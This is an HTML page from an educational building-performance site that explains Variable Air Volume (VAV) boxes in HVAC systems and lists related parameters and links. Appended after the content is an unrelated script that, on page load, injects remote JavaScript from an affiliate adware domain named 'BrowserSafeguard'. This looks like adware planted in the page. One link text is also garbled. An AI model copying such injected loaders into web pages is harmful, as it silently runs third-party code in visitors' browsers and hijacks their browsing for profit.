﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>VAV-BOXES</h1>
<!--<h3>Associated System: </h3>-->
<div class="graphic"> <img src="../HVAC AHU & Ducts/VAVBox.png" alt=""/ ></div>     
<p>Variable Air Volume (VAV) Boxes,  provide air directly into the zones. The air is delivered to the boxes from HVAC ducts (typically located in the space the zone's ceiling). These boxes are equipped with dampers which open an close depending on the need for conditioned air. VAV boxes may also be equipped with a hot water coil in order to "re-heat" the air when necessary in order to maintain comfortable levels within the zone.</p>
<p>(<a href="#">See also the �</a> )</p>
<!--<p></p>-->      
<!--<h4></h4>-->
<!--<h2>Variable Descriptions</h2>-->      
<!--<ul class="list-variable">-->        
<!--<li><label>Default:</label> </li>-->
<!--<li><label>Minimum:</label> </li>-->
<!--<li><label>Maximum:</label> </li>-->
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->        
<!--<li><label>IP Unit:</label> </li>-->
<!--<li><label>SI Units:</label> </li>-->
<!--</ul>-->
<h2>Related Items: </h2>
<ul> <li>VAV1 max cooling air flow rate</li><li>VAV1 air side pressure drop at max cooling</li><li>Zone 1 VAV min volume flow rate ratio</li><li>Zone 1 VAV damper controller P gain</li><li>Zone 1 VAV damper controller integrator time constant</li> </ul>
<h2>Links:</h2>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Variable_air_volume" target="_blank">http://en.wikipedia.org/wiki/Variable_air_volume</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li></ul>
<div class="version"> Version 1.00</div>    </div></div></div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();
</script>
</body>
</html>
